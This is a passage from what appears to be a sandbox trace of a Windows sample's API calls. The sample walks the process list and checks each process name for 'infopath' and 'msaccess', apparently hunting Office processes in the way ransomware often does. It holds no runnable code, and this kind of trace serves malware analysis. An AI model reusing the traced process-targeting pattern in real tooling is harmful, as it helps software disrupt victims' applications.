lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.000] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577ff0 [0097.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577ff0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.000] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.000] StrStrIA (lpFirst="svchost.exe", lpSrch="infopath") returned 0x0 [0097.000] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0097.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.001] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576238 [0097.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3576238, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.001] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0097.001] StrStrIA (lpFirst="dllhost.exe", lpSrch="infopath") returned 0x0 [0097.001] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.003] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35760d0 [0097.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35760d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0097.003] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0097.003] StrStrIA (lpFirst="taskhostw.exe", lpSrch="infopath") returned 0x0 [0097.003] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0097.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.005] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35761f0 [0097.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x35761f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0097.005] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0097.005] StrStrIA (lpFirst="UsoClient.exe", lpSrch="infopath") returned 0x0 [0097.005] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.006] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35760e8 [0097.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35760e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0097.006] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0097.006] StrStrIA (lpFirst="taskhostw.exe", lpSrch="infopath") returned 0x0 [0097.006] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0097.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0097.008] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3575700 [0097.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3575700, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0097.008] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0097.008] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="infopath") returned 0x0 [0097.008] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0097.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.009] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575580 [0097.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3575580, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0097.009] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0097.009] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="infopath") returned 0x0 [0097.009] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0097.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0097.010] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356b4b0 [0097.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356b4b0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0097.010] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0097.011] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="infopath") returned 0x0 [0097.011] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0097.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.012] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576208 [0097.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3576208, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.012] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0097.012] StrStrIA (lpFirst="conhost.exe", lpSrch="infopath") returned 0x0 [0097.012] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0097.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.013] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576370 [0097.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3576370, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.013] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0097.013] StrStrIA (lpFirst="conhost.exe", lpSrch="infopath") returned 0x0 [0097.013] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0097.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.015] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3576220 [0097.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3576220, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0097.015] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0097.015] StrStrIA (lpFirst="rxodge.exe", lpSrch="infopath") returned 0x0 [0097.015] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0097.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.016] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3576250 [0097.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3576250, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0097.016] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0097.016] StrStrIA (lpFirst="sppsvc.exe", lpSrch="infopath") returned 0x0 [0097.016] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0097.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.017] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575600 [0097.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3575600, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0097.017] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0097.017] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="infopath") returned 0x0 [0097.017] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0097.018] CloseHandle (hObject=0x358) returned 1 [0097.020] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0097.049] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0097.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.051] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575660 [0097.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3575660, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0097.051] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0097.051] StrStrIA (lpFirst="[System Process]", lpSrch="msaccess") returned 0x0 [0097.051] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0097.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0097.053] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574cc0 [0097.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574cc0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0097.053] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0097.053] StrStrIA (lpFirst="System", lpSrch="msaccess") returned 0x0 [0097.053] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0097.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.054] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3576328 [0097.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3576328, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0097.054] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0097.054] StrStrIA (lpFirst="smss.exe", lpSrch="msaccess") returned 0x0 [0097.054] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.055] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576118 [0097.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3576118, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0097.056] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0097.056] StrStrIA (lpFirst="csrss.exe", lpSrch="msaccess") returned 0x0 [0097.056] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0097.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.057] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576268 [0097.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3576268, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0097.057] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0097.057] StrStrIA (lpFirst="wininit.exe", lpSrch="msaccess") returned 0x0 [0097.057] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.058] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576280 [0097.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3576280, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0097.058] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0097.058] StrStrIA (lpFirst="csrss.exe", lpSrch="msaccess") returned 0x0 [0097.058] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0097.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.060] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576298 [0097.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3576298, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0097.060] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0097.060] StrStrIA (lpFirst="winlogon.exe", lpSrch="msaccess") returned 0x0 [0097.060] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0097.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.061] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35762b0 [0097.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x35762b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0097.061] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0097.061] StrStrIA (lpFirst="services.exe", lpSrch="msaccess") returned 0x0 [0097.061] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0097.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.062] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35762c8 [0097.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x35762c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0097.062] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0097.062] StrStrIA (lpFirst="lsass.exe", lpSrch="msaccess") returned 0x0 [0097.063] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.064] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576160 [0097.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576160, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.064] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.064] StrStrIA (lpFirst="svchost.exe", lpSrch="msaccess") returned 0x0 [0097.064] Process32NextW (in: hSnapshot=0x350, 